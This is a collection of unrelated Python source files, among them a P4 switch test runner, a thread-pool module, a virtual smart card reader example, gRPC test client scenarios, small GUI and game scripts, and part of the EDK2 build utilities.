self.do_command(line)
cli.stdin.close()
for interface, fp in self.interfaces.iteritems():
fp.close()
# Give time to the model to execute
time.sleep(2)
cli.terminate()
sw.terminate()
sw.wait()
# This only works on Unix: negative returncode is
# minus the signal number that killed the process.
if sw.returncode != 0 and sw.returncode != -15: # 15 is SIGTERM
reportError("simple_switch died with return code", sw.returncode);
rv = FAILURE
elif self.options.verbose:
print("simple_switch exit code", sw.returncode)
cli.wait()
if cli.returncode != 0 and cli.returncode != -15:
reportError("CLI process failed with exit code", cli.returncode)
rv = FAILURE
finally:
try:
os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
except OSError:
pass
concurrent.release(rand)
if self.options.verbose:
print("Execution completed")
return rv
def comparePacket(self, expected, received):
received = ''.join(ByteToHex(str(received)).split()).upper()
expected = ''.join(expected.split()).upper()
if len(received) < len(expected):
reportError("Received packet too short", len(received), "vs", len(expected))
return FAILURE
for i in range(0, len(expected)):
if expected[i] == "*":
continue;
if expected[i] != received[i]:
reportError("Packet different at position", i, ": expected", expected[i], ", received", received[i])
return FAILURE
return SUCCESS
def showLog(self):
with open(self.folder + "/" + self.switchLogFile + ".txt") as a:
log = a.read()
print("Log file:")
print(log)
def checkOutputs(self):
if self.options.verbose:
print("Comparing outputs")
direction = "out"
for file in glob(self.filename('*', direction)):
interface = self.interface_of_filename(file)
if os.stat(file).st_size == 0:
packets = []
else:
try:
packets = rdpcap(file)
except:
reportError("Corrupt pcap file", file)
self.showLog()
return FAILURE
# Log packets.
if self.options.observationLog:
observationLog = open(self.options.observationLog, 'w')
for pkt in packets:
observationLog.write('%d %s\n' % (
interface,
''.join(ByteToHex(str(pkt)).split()).upper()))
observationLog.close()
# Check for expected packets.
if interface in self.expectedAny:
if interface in self.expected:
reportError("Interface " + interface + " has both expected with packets and without")
continue
if interface not in self.expected:
expected = []
else:
expected = self.expected[interface]
if len(expected) != len(packets):
reportError("Expected", len(expected), "packets on port", str(interface),
"got", len(packets))
self.showLog()
return FAILURE
for i in range(0, len(expected)):
cmp = self.comparePacket(expected[i], packets[i])
if cmp != SUCCESS:
reportError("Packet", i, "on port", str(interface), "differs")
return FAILURE
# remove successfully checked interfaces
if interface in self.expected:
del self.expected[interface]
if len(self.expected) != 0:
# didn't find all the expects we were expecting
reportError("Expected packects on ports", self.expected.keys(), "not received")
return FAILURE
else:
return SUCCESS
def run_model(options, tmpdir, jsonfile, testfile):
bmv2 = RunBMV2(tmpdir, options, jsonfile)
result = bmv2.generate_model_inputs(testfile)
if result != SUCCESS:
return result
result = bmv2.run()
if result != SUCCESS:
return result
result = bmv2.checkOutputs()
return result
######################### main
def usage(options):
print("usage:", options.binary, "[-v] [-observation-log <file>] <json file> <stf file>");
def main(argv):
options = Options()
options.binary = argv[0]
argv = argv[1:]
while len(argv) > 0 and argv[0][0] == '-':
if argv[0] == "-b":
options.preserveTmp = True
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == '-observation-log':
if len(argv) == 1:
reportError("Missing argument", argv[0])
usage(options)
sys.exit(1)
options.observationLog = argv[1]
argv = argv[1:]
else:
reportError("Unknown option ", argv[0])
usage(options)
argv = argv[1:]
if len(argv) < 2:
usage(options)
return FAILURE
if not os.path.isfile(argv[0]) or not os.path.isfile(argv[1]):
usage(options)
return FAILURE
tmpdir = tempfile.mkdtemp(dir=".")
result = run_model(options, tmpdir, argv[0], argv[1])
if options.preserveTmp:
print("preserving", tmpdir)
else:
shutil.rmtree(tmpdir)
if options.verbose:
if result == SUCCESS:
print("SUCCESS")
else:
print("FAILURE", result)
return result
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
threads.py
|
from abots.helpers import eprint, cast
from abots.events import Every
from queue import Queue, Empty, Full
from threading import Thread, Event, Lock, RLock, BoundedSemaphore
from contextlib import contextmanager
"""
TODO:
"""
@contextmanager
def acquire_timeout(lock, timeout=-1):
if timeout is None:
timeout = -1
result = lock.acquire(timeout=timeout)
yield result
if result:
lock.release()
class ThreadPool:
def __init__(self, pool_size, timeout=None):
self.locks = list()
self.events = list()
self.queues = list()
self.workers = list()
data = dict()
for s in range(pool_size):
lock = Lock()
event = Event()
queue = Queue()
args = (s, event, queue, timeout)
worker = Thread(target=self._worker, args=args)
worker.setDaemon(True)
self.locks.append(lock)
self.events.append(event)
self.queues.append(queue)
self.workers.append(worker)
worker.start()
def _exec_controls(self, controls):
for action, methods in controls.items():
for method in methods:
cast(method, action)
def _worker(self, worker_id, event, queue, timeout=None):
while not event.is_set():
try:
# NOTE: This is really spammy, use only in case of emergencies
# print(f"[worker:{worker_id}]: Getting task")
if timeout is not None:
job = queue.get(block=True, timeout=timeout)
else:
job = queue.get_nowait()
if len(job) != 2:
# print(f"[worker:{worker_id}]: Job is malformed")
continue
controls, task = job
if type(controls) != dict:
# print(f"[worker:{worker_id}]: Controls are malformed")
continue
if task is None: # NOTE: Poison pill to kill worker
# print(f"[worker:{worker_id}]: Poisoned")
event.set()
self._exec_controls(controls)
break
if len(task) != 3:
# print(f"[worker:{worker_id}]: Task is malformed")
self._exec_controls(controls)
continue
method, args, kwargs = task
# print(f"[worker:{worker_id}]: Running task")
try:
method(*args, **kwargs)
except Exception as e:
print(e)
finally:
# print(f"[worker:{worker_id}]: Task complete")
self._exec_controls(controls)
queue.task_done()
except Empty:
continue
# Clear out the queue
# print(f"[worker:{worker_id}]: Clearing out queue")
while True:
try:
queue.get_nowait()
queue.task_done()
except Empty:
break
def stop(self, done=None, wait=True):
# print(f"Stopping pool")
for event in self.events:
event.set()
if wait:
for worker in self.workers:
worker.join()
cast(done, "set")
# print(f"Stopped pool")
class ThreadMarshal:
def __init__(self, pool_size, monitor=1, cleanup=True, timeout=None,
destroy=False):
self.pool_size = pool_size
self.monitor_interval = monitor
self.cleanup = cleanup
self.timeout = timeout
self.destroy = destroy
self.stopped = Event()
self._manager = Lock() # NOTE: Maybe make this an RLock?
self._load_presets()
self._add_pool()
if self.monitor_interval > 0:
self.monitor = Every(self.monitor_interval, self._monitor)
self.monitor.start()
def _next_pool(self):
self._pool_cursor = (self._pool_cursor + 1) % len(self.pools)
def _next_worker(self):
self._worker_cursor = (self._worker_cursor + 1) % self.pool_size
# NOTE: This is a potential optimization for later
# if self._worker_cursor == 0:
# self._next_pool()
def _load_presets(self):
self._pool_cursor = 0
self._worker_cursor = 0
self.pools = list()
self.locks = list()
self.events = list()
self.queues = list()
self.workers = list()
self.semaphores = list()
def _get_idle_pools(self):
idle_pools = list()
if len(self.pools) == 1:
return idle_pools
for index, queues in enumerate(self.queues):
if index == 0:
continue
queues_empty = [queue.empty() for queue in queues]
idle = all(queues_empty)
if not idle:
continue
print(f"[manager] Pool {index} is idle")
idle_pools.append(self.pools[index])
return idle_pools
def _monitor(self, state):
# print("[manager] Cleaning pools")
if self._manager.locked():
return # Try again later
with self._manager:
idle_pools = self._get_idle_pools()
if self.destroy and len(idle_pools) == len(self.pools):
self.stop()
elif self.cleanup and len(idle_pools) > 0:
cleaning = Event()
self._cleaner(idle_pools, cleaning)
cleaning.wait()
return None
def _cleaner(self, idle_pools, done=None):
print("[manager] Cleaning pools")
for pool in idle_pools:
self._stop_pool(pool, wait=done is not None)
print("[manager] Pools are cleaned")
cast(done, "set")
def _stop_pool(self, pool, done=None, wait=True):
index = self.pools.index(pool)
# print(f"[manager] Stopping pool {index}")
lock = self.locks[index]
event = self.events[index]
queue = self.queues[index]
worker = self.workers[index]
semaphore = self.semaphores[index]
self.pools.remove(pool)
self.locks.remove(lock)
self.events.remove(event)
self.queues.remove(queue)
self.workers.remove(worker)
self.semaphores.remove(semaphore)
pool.stop(done, wait)
# print(f"[manager] Stopped pool {index}")
def _run(self, task, controls, reserve, coordinates):
pool_index, worker_index = coordinates
# print(f"[manager:reserve] Trying worker {self.worker_index}")
lock = self.locks[pool_index][worker_index]
event =self.events[pool_index][worker_index]
queue =self.queues[pool_index][worker_index]
if event.is_set() or lock.locked():
return False
if not reserve:
lock = Lock()
# print(f"[manager:reserve] Using worker {worker_index}")
lock.acquire()
release = controls.get("release", list())
release.append(lock)
job = controls, task
queue.put_nowait(job)
return True
def _add_pool(self):
index = len(self.pools)
# print(f"[manager] Adding pool {index}")
pool = ThreadPool(self.pool_size, self.timeout)
self.pools.append(pool)
self.locks.append(pool.locks)
self.events.append(pool.events)
self.queues.append(pool.queues)
self.workers.append(pool.workers)
self.semaphores.append(BoundedSemaphore(self.pool_size))
return index
def add_pool(self):
with self._manager:
self._add_pool()
def clean(self, done=None):
with self._manager:
idle_pools = self._get_idle_pools()
if self.cleanup and len(idle_pools) > 0:
self._cleaner(idle_pools, done)
def wait(self):
# print("[manager] Waiting on workers in pools")
with self._manager:
for pool in self.pools:
for worker in pool.workers:
worker.join()
def stop(self, wait=True):
# print("[manager] Stopping")
if self.monitor_interval > 0:
self.monitor.event.set()
with self._manager:
dones = list()
threads = list()
for pool in self.pools:
done = Event()
dones.append(done)
thread = Thread(target=pool.stop, args=(done, wait))
thread.setDaemon(True)
threads.append(thread)
thread.start()
if wait:
for thread in threads:
thread.join(self.timeout)
self._load_presets()
cast(self.stopped, "set")
# print("[manager] Stopped")
def run(self, task, done, reserve, coordinates):
if len(task) != 3:
return None
if len(coordinates) != 2:
return None
method, args, kwargs = task
if not callable(method) or type(args) != tuple or type(kwargs) != dict:
return None
pool_index, worker_index = coordinates
if pool_index >= len(self.pools) or worker_index >= self.pool_size:
return None
with self.manager:
semaphore = self.semaphores[pool_index]
if not semaphore.acquire(False):
return None
controls = dict()
controls["set"] = [done]
controls["release"] = [sempahore]
self._run(task, controls, reserve, coordinates)
return True
def reserve(self, method, args=tuple(), kwargs=dict(), reserve=True):
# print("[manager:reserve] Acquiring lock")
done = Event()
with self._manager:
task = method, args, kwargs
if self._pool_cursor >= len(self.pools):
self._next_pool()
pool_found = False
for p in range(len(self.pools)):
# print(f"[manager:reserve] Trying pool {self._pool_cursor}")
semaphore = self.semaphores[self._pool_cursor]
if not semaphore.acquire(False):
self._next_pool()
continue
pool_found = True
break
if not pool_found:
# print(f"[manager:reserve] Pools are full, adding new pool")
index = self._add_pool()
self._pool_cursor = index
self._worker_cursor = 0
semaphore = self.semaphores[self._pool_cursor]
semaphore.acquire()
# print(f"[manager:reserve] Using pool {self._pool_cursor}")
pool = self.pools[self._pool_cursor]
for w in range(self.pool_size):
coordinates = (self._pool_cursor, self._worker_cursor)
controls = dict()
controls["set"] = [done]
controls["release"] = [semaphore]
queued = self._run(task, controls, reserve, coordinates)
self._next_worker()
if not queued:
continue
break
return done
|
vicc-vpcdHost.py
|
"""
Example Virtual Smart Card Reader aka Virtual Proximity Coupling Device (vpcd) application to run the WebSocketServerVICC example.
It waits for a socket connecting virtual smart card aka Virtual Integrated Circuit Card (vicc) and sends a GET_CHALLENGE(1) CAPDU (command application protocol data unit).
Example exchange:
vicc<--vpcd<--app<--CAPDU
RAPDU-->vicc-->vpcd-->app
[https://frankmorgner.github.io/vsmartcard/virtualsmartcard/api.html#virtualsmartcard-api]
"""
import socket
import threading
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('', 35963)) #35963
s.listen()
def clienthandler(conn,addr):
# CAPDU = 2 Bytes apdu length (bigendian), and following apdu. Apdu is an extended length get_challenge expecting one random byte in the respose apdu (RAPDU).
apdu = bytearray([0x00,0x07,0x00,0x84,0x00,0x00,0x00,0x00,0x01])
conn.sendall(apdu)
print(addr[0], ':', str(addr[1]),' sent: ',''.join('%02x ' % byte for byte in apdu))
receivedBytes = conn.recv(4096)
print(addr[0], ':', str(addr[1]),' received: ', ''.join('%02x ' % byte for byte in receivedBytes))
conn.close()
while 1: # all connections are taken within this main thread and then handled by a new thread each
conn, addr = s.accept()
print('client '+addr[0] + ':' + str(addr[1]))
threading.Thread(target=clienthandler, args=(conn,addr)).start()
s.close()
|
main_example.py
|
import signal
from threading import Thread
from PyQt6.QtWidgets import QMainWindow
import pglive.examples_pyqt6 as examples
from pglive.examples_pyqt6.designer_example.win_template import Ui_MainWindow
from pglive.sources.data_connector import DataConnector
from pglive.sources.live_plot import LiveLinePlot
class MainWindow(QMainWindow, Ui_MainWindow):
"""Create main window from template"""
def __init__(self, parent=None):
super().__init__(parent)
self.setupUi(self)
win = MainWindow()
plot = LiveLinePlot()
data_connector = DataConnector(plot, max_points=600)
win.plot_widget.addItem(plot)
Thread(target=examples.sin_wave_generator, args=(data_connector,)).start()
signal.signal(signal.SIGINT, lambda sig, frame: examples.stop())
win.show()
examples.app.exec()
examples.stop()
|
_client_application.py
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An example gRPC Python-using client-side application."""
import collections
import enum
import threading
import time
import grpc
from tests.testing import _application_common
from tests.testing.proto import requests_pb2
from tests.testing.proto import services_pb2
from tests.testing.proto import services_pb2_grpc
from tests.unit.framework.common import test_constants
@enum.unique
class Scenario(enum.Enum):
UNARY_UNARY = 'unary unary'
UNARY_STREAM = 'unary stream'
STREAM_UNARY = 'stream unary'
STREAM_STREAM = 'stream stream'
CONCURRENT_STREAM_UNARY = 'concurrent stream unary'
CONCURRENT_STREAM_STREAM = 'concurrent stream stream'
CANCEL_UNARY_UNARY = 'cancel unary unary'
CANCEL_UNARY_STREAM = 'cancel unary stream'
INFINITE_REQUEST_STREAM = 'infinite request stream'
class Outcome(collections.namedtuple('Outcome', ('kind', 'code', 'details'))):
"""Outcome of a client application scenario.
Attributes:
kind: A Kind value describing the overall kind of scenario execution.
code: A grpc.StatusCode value. Only valid if kind is Kind.RPC_ERROR.
details: A status details string. Only valid if kind is Kind.RPC_ERROR.
"""
@enum.unique
class Kind(enum.Enum):
SATISFACTORY = 'satisfactory'
UNSATISFACTORY = 'unsatisfactory'
RPC_ERROR = 'rpc error'
_SATISFACTORY_OUTCOME = Outcome(Outcome.Kind.SATISFACTORY, None, None)
_UNSATISFACTORY_OUTCOME = Outcome(Outcome.Kind.UNSATISFACTORY, None, None)
class _Pipe(object):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._open = True
def __iter__(self):
return self
def _next(self):
with self._condition:
while True:
if self._values:
return self._values.pop(0)
elif not self._open:
raise StopIteration()
else:
self._condition.wait()
def __next__(self): # (Python 3 Iterator Protocol)
return self._next()
def next(self): # (Python 2 Iterator Protocol)
return self._next()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def close(self):
with self._condition:
self._open = False
self._condition.notify_all()
def _run_unary_unary(stub):
response = stub.UnUn(_application_common.UNARY_UNARY_REQUEST)
if _application_common.UNARY_UNARY_RESPONSE == response:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_unary_stream(stub):
response_iterator = stub.UnStre(_application_common.UNARY_STREAM_REQUEST)
try:
next(response_iterator)
except StopIteration:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_unary(stub):
response, call = stub.StreUn.with_call(
iter((_application_common.STREAM_UNARY_REQUEST,) * 3))
if (_application_common.STREAM_UNARY_RESPONSE == response and
call.code() is grpc.StatusCode.OK):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_stream(stub):
request_pipe = _Pipe()
response_iterator = stub.StreStre(iter(request_pipe))
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
first_responses = next(response_iterator), next(response_iterator)
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
second_responses = next(response_iterator), next(response_iterator)
request_pipe.close()
try:
next(response_iterator)
except StopIteration:
unexpected_extra_response = False
else:
unexpected_extra_response = True
if (first_responses == _application_common.TWO_STREAM_STREAM_RESPONSES and
second_responses == _application_common.TWO_STREAM_STREAM_RESPONSES
and not unexpected_extra_response):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_concurrent_stream_unary(stub):
future_calls = tuple(
stub.StreUn.future(iter((_application_common.STREAM_UNARY_REQUEST,) *
3))
for _ in range(test_constants.THREAD_CONCURRENCY))
for future_call in future_calls:
if future_call.code() is grpc.StatusCode.OK:
response = future_call.result()
if _application_common.STREAM_UNARY_RESPONSE != response:
return _UNSATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
def _run_concurrent_stream_stream(stub):
condition = threading.Condition()
outcomes = [None] * test_constants.RPC_CONCURRENCY
def run_stream_stream(index):
outcome = _run_stream_stream(stub)
with condition:
outcomes[index] = outcome
condition.notify()
for index in range(test_constants.RPC_CONCURRENCY):
thread = threading.Thread(target=run_stream_stream, args=(index,))
thread.start()
with condition:
while True:
if all(outcomes):
for outcome in outcomes:
if outcome.kind is not Outcome.Kind.SATISFACTORY:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
else:
condition.wait()
def _run_cancel_unary_unary(stub):
response_future_call = stub.UnUn.future(
_application_common.UNARY_UNARY_REQUEST)
initial_metadata = response_future_call.initial_metadata()
cancelled = response_future_call.cancel()
if initial_metadata is not None and cancelled:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_infinite_request_stream(stub):
def infinite_request_iterator():
while True:
yield _application_common.STREAM_UNARY_REQUEST
response_future_call = stub.StreUn.future(
infinite_request_iterator(),
timeout=_application_common.INFINITE_REQUEST_STREAM_TIMEOUT)
if response_future_call.code() is grpc.StatusCode.DEADLINE_EXCEEDED:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
_IMPLEMENTATIONS = {
Scenario.UNARY_UNARY: _run_unary_unary,
Scenario.UNARY_STREAM: _run_unary_stream,
Scenario.STREAM_UNARY: _run_stream_unary,
Scenario.STREAM_STREAM: _run_stream_stream,
Scenario.CONCURRENT_STREAM_UNARY: _run_concurrent_stream_unary,
Scenario.CONCURRENT_STREAM_STREAM: _run_concurrent_stream_stream,
Scenario.CANCEL_UNARY_UNARY: _run_cancel_unary_unary,
Scenario.INFINITE_REQUEST_STREAM: _run_infinite_request_stream,
}
def run(scenario, channel):
stub = services_pb2_grpc.FirstServiceStub(channel)
try:
return _IMPLEMENTATIONS[scenario](stub)
except grpc.RpcError as rpc_error:
return Outcome(Outcome.Kind.RPC_ERROR, rpc_error.code(),
rpc_error.details())
|
main.py
|
from tkinter import *
from threading import Thread
from record import record_to_file
from features import mfcc
from anntester_single import *
import scipy.io.wavfile as wav
class Application(Frame):
def createWidgets(self):
self.button_image = PhotoImage(file="button.gif")
self.RECORD = Button(self, image=self.button_image, width="100", height="100", command=self.record_buttonpress)
self.RECORD.pack()
self.TEXTBOX = Text(self, height="1", width="30")
self.TEXTBOX.pack()
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.createWidgets()
self.TEXTBOX.insert(INSERT, "Press to record")
self.TEXTBOX.tag_config("recording", foreground="red", justify="center")
self.TEXTBOX.tag_config("success", foreground="darkgreen", justify="center")
self.TEXTBOX.configure(state="disabled")
def record_buttonpress(self):
recorder_thread = Thread(target=record_and_test, args=(self.TEXTBOX, self.RECORD))
recorder_thread.start()
def record_and_test(textbox, button, filename="test_files/test.wav"):
# Disable button and change text
button.configure(state="disabled")
textbox.configure(state="normal")
textbox.delete("1.0", END)
textbox.insert(INSERT, "Recording")
textbox.tag_add("recording", "1.0", END)
textbox.configure(state="disabled")
# Record to file
record_to_file(filename)
# Feed into ANN
testNet = testInit()
inputArray = extractFeature(filename)
print(len(inputArray))
outStr = feedToNetwork(inputArray,testNet)
# Change text and re-enable button
textbox.configure(state="normal")
textbox.delete("1.0", END)
textbox.tag_remove("recording", "1.0")
textbox.insert(INSERT, outStr)
textbox.tag_add("success", "1.0", END)
textbox.configure(state="disabled")
button.configure(state="normal")
if __name__ == '__main__':
# Display GUI
root = Tk()
app = Application(master=root)
app.mainloop()
#root.destroy()
|
AnimatedQuintris.py
|
# "Fancier" animated interactive version of quintris. v0.2
# D. Crandall, Sept 2021
#
# DON'T MODIFY THIS FILE! Or else we might not be able to grade your submission properly.
#
from QuintrisGame import *
class AnimatedQuintris(QuintrisGame):
def __init__(self):
QuintrisGame.__init__(self)
# This thread just repeated displays the current game board to the screen.
def display_thread(self):
while 1:
self.print_board(True)
print("Controls: b moves left, n rotates, m moves right, h flips, spacebar drops\n")
time.sleep(0.1)
# This thread is in charge of making the piece fall over time.
def gravity_thread(self):
while True:
while 1:
time.sleep(0.5)
self.row = self.row+1
if(QuintrisGame.check_collision(*self.state, self.piece, self.row+1, self.col)): break
# place new piece in final resting spot
self.finish()
# This thread just starts things up
def start_game(self, player):
t2 = threading.Thread(target=self.gravity_thread)
t2.setDaemon(True)
t3 = threading.Thread(target=self.display_thread)
t3.setDaemon(True)
t2.start()
t3.start()
player.control_game(self)
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import Common.LongFilePathOs as os
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
from struct import pack
from UserDict import IterableUserDict
from UserList import UserList
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from .DataType import *
from .BuildToolError import *
from CommonDataClass.DataClass import *
from .Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import uuid
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
import subprocess
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile("^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile("^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile('^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store file time stamp for quick re-access
gFileTimeStampCache = {} # {file path : file time stamp}
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes
# a temporary INF file with same content is created, the temporary file is removed
# when build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
# status machine transection
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = valuePatternGcc.match(line)
if m is not None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m is not None:
m = re.match(".data.(%s)$" % varname, line)
if m is not None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = pcdPatternGcc.match(Str.strip())
if m is not None:
varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if startPatternGeneral.match(line):
status = 1
continue
if addressPatternGeneral.match(line):
status = 2
continue
if line.startswith("entry point at"):
status = 3
continue
if status == 1 and len(line) != 0:
m = secReGeneral.match(line)
assert m is not None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
# cannot pregenerate this RegEx since it uses varname from varnames.
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 is not None:
# fond a binary pcd entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
# A temporary INF is copied to database path which must have write permission
# The temporary will be removed at the end of build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
if f1.read() == f2.read():
return RtPath
_TempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporary created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
while _TempInfs:
File = _TempInfs.pop()
if os.path.exists(File):
os.remove(File)
